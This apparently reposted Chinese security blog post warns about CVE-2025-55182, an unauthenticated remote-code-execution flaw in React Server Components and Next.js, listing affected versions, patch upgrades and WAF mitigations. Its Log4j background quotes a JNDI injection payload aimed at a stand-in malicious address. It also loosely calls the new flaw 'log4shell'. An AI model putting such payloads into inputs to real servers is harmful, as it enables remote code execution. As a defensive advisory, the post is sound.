文章总结： 2025年12月爆出的CVE-2025-55182漏洞堪称前端全栈时代核弹级威胁，影响React19及Next.js15/16核心组件。该漏洞通过RSC端点实现无需认证的远程代码执行，CVSS评分10.0。建议立即升级至Next.js16.0.7或15.5.7等补丁版本，或配置WAF拦截恶意请求进行防御。 综合评分： 82 文章分类： 漏洞预警,WEB安全,漏洞分析,解决方案

【核弹级】又一log4J的核弹级漏洞出现

原创

搞安全的面具侠

搞安全的面具侠

2025年12月4日 09:38 四川 标题已修改

就在昨天晚上，一个类似于log4J的史诗级漏洞出现了！！！

如果说2021年的Log4J是 Java 届的噩梦，昨天晚上突然被爆出来的CVE-2025-55182，就是前端全栈时代的“杀手锏”。

log4j是啥：Log4j 是一个由 Apache 软件基金会维护的开源 Java 日志记录框架，广泛用于记录应用程序中的信息、错误等事件。 它本身是一个工具库，帮助开发人员跟踪和调试软件。

log4shell：Log4Shell是 Log4j 库中发现的一个严重安全漏洞。 具体来说，它是 Log4j 某些版本中存在的远程代码执行漏洞，允许攻击者在易受攻击的系统上运行任意恶意代码。 因此，Log4Shell 是 Log4j 框架的一个缺陷，而不是框架本身。

简而言之：

• Log4j 是正常的日志记录工具。

• Log4Shell 是 Log4j 中一个危险的安全漏洞。

简单粗暴的说一下这个危害为啥这么大：

这个漏洞之所以危害巨大，是因为它存在于一个被广泛使用的Java日志记录组件‌Apache Log4j2‌中。攻击者可以通过构造特定的恶意数据（例如，一条包含 ${jndi:ldap://恶意地址/注入代码} 的日志记录），让服务器执行任意代码，从而完全控制目标系统。

怎么样，简单吧，手法就跟五岁小孩吃棒棒糖一样！！！！

这次我们说的log4shell漏洞，意味着啥？？？意味着这意味着：攻击者无需任何身份验证，仅通过一个 HTTP 请求，即可在你的服务器上执行任意代码。CVSS 评分直接拉满到 10.0，无需认证、远程代码执行（RCE）、影响 React 19 及 Next.js 15/16 核心组件。

兄弟们，秀一波的机会来了，赶紧排查一下吧！！！

受影响组件：

所有使用了 React 官方 RSC 实现的框架，

React (react-server & dom-variants):

• 19.0.0
• 19.0.1 (注：部分早期补丁未完全覆盖)
• 19.1.x
• 19.2.0

受影响版本：

Next.js (App Router 用户):由于 Next.js 深度集成了 RSC，以下版本均受影响：

• Next.js v15.0.0 – v15.0.4
• Next.js v15.1.0 – v15.1.8
• Next.js v15.2.x – v15.5.6
• Next.js v16.0.0 – v16.0.6
• Next.js v14.3.0-canary.77 及以上 Canary 版本

保护方法：

1-升级，升级到以下补丁版本或更高：

Next.js v16

npm install [email protected]

Next.js v15 (选择对应子版本的最新补丁)

npm install [email protected]

或 15.4.8, 15.3.6, 15.2.6, 15.1.9, 15.0.5

Next.js v14 Canary

或者是降级回 v14 稳定版或升级至 v15 固定版

2-检查你的 Web 应用防火墙（WAF）。

• Cloudflare 和 AWS 已经更新了托管规则集，拦截针对 RSC 端点的畸形 Flight 协议请求。
• 手动策略： 可以在网关层临时阻断包含异常 Content-Type 或超长/异常结构的 POST 请求访问 RSC 接口，但这可能会误伤正常用户！！！

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：搞安全的面具侠 搞安全的面具侠《【核弹级】又一log4J的核弹级漏洞出现》